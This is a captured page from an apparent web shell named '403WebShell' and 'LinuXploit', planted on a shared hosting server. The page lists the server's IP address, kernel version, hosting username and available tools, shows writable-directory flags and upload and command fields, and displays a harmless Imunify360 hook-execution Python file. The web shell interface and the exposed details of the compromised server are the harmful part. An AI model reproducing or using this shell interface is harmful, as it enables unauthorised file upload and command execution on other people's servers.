Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.144.89.197
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/imunify360/venv/lib/python3.11/site-packages/defence360agent/hooks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/imunify360/venv/lib/python3.11/site-packages/defence360agent/hooks/execute.py
import json
import os
import subprocess
import tempfile

from defence360agent.contracts.config import Core
from defence360agent.hooks import native as native_hooks
from defence360agent.internals.logger import EventHookLogger
from defence360agent.model.event_hook import EventHook
from defence360agent.model.instance import db
from defence360agent.utils import run, snake_case

# Module-level logger instance; execute_hooks() calls it with an event name
# and subtype to obtain the context manager that wraps a hook run.
event_hook_logger = EventHookLogger()


def get_hooks(event):
    """Return the list of EventHook rows whose ``event`` equals *event*.

    An empty list is returned when ``db.deferred`` is truthy, i.e. the
    database is not available (for example on a direct RPC call), so no
    query is attempted in that case.
    """
    if not db.deferred:
        matching = EventHook.select().where(EventHook.event == event)
        return list(matching)
    # database unavailable: behave as if no hooks are registered
    return []


async def execute_hook(path, data, native=False):
    """Execute a single hook and report the outcome as ``(exit_code, err)``.

    :param path: location of the hook; for non-native hooks it is passed
        to ``run`` as a shell command and its directory becomes the
        working directory
    :param data: payload for the hook; handed as-is to a native hook,
        JSON-encoded and fed as input otherwise
    :param native: when true, dispatch through ``native_hooks`` instead
        of spawning a command
    :return: ``(0, None)`` after a native hook returns normally; the exit
        code and the third element of ``run``'s result for a non-native
        hook; ``(None, repr(exception))`` if anything raised
    """
    try:
        if not native:
            payload = json.dumps(data).encode()
            workdir = os.path.dirname(path)
            status, _out, stderr = await run(
                path, shell=True, input=payload, cwd=workdir
            )
            return status, stderr
        native_hooks.execute_hook(path, data)
    except Exception as exc:
        # never let a failing hook propagate; report it to the caller instead
        return None, repr(exc)

    return 0, None


async def execute_hooks(event, tempdir=Core.TMPDIR):
    """Run every hook registered for *event*, one after another.

    *event* is used both as a mapping (``event.get``, ``dict(event)``) and
    as an object exposing ``event`` and ``subtype`` attributes. Each hook
    receives a dict with the keys ``"event"``, ``"subtype"`` and
    ``"params"``, where ``"params"`` is a copy of the event mapping.

    If the event carries a truthy ``"DUMP"`` entry, it is serialized as
    JSON into a temporary file inside *tempdir* and the file name is
    exposed to the hooks as ``params["tmp_filename"]``. The file is closed
    (and thereby removed) once all hooks have finished, including when an
    exception propagates out of this function.

    :param event: the event to dispatch hooks for
    :param tempdir: directory in which the dump file is created
    :return: ``None``; returns immediately when no hooks are registered
    """
    dump = event.get("DUMP")
    params = dict(event)
    hooks = get_hooks(event.event)

    if not hooks:
        return

    tmp = None
    try:
        with event_hook_logger(event.event, event.subtype) as event_logger:
            if dump:
                prefix = snake_case(event.__class__.__name__) + "_"
                tmp = tempfile.NamedTemporaryFile(
                    mode="w+", prefix=prefix, suffix=".json", dir=tempdir
                )
                json.dump(dump, tmp)
                # make sure the content is on disk before hooks are given
                # the file name
                tmp.flush()
                os.fsync(tmp.fileno())
                params["tmp_filename"] = tmp.name

            data = {
                "event": event.event,
                "subtype": event.subtype,
                "params": params,
            }

            for hook in hooks:
                with event_logger(
                    hook.path, native=hook.native
                ) as hook_logger:
                    hook_logger.begin()
                    exit_code, err = await execute_hook(
                        hook.path, data, native=hook.native
                    )
                    hook_logger.finish(exit_code, err)
    finally:
        # Close the dump file explicitly rather than relying on garbage
        # collection; closing a NamedTemporaryFile also deletes it.
        if tmp is not None:
            tmp.close()

Youez - 2016 - github.com/yon3zu
LinuXploit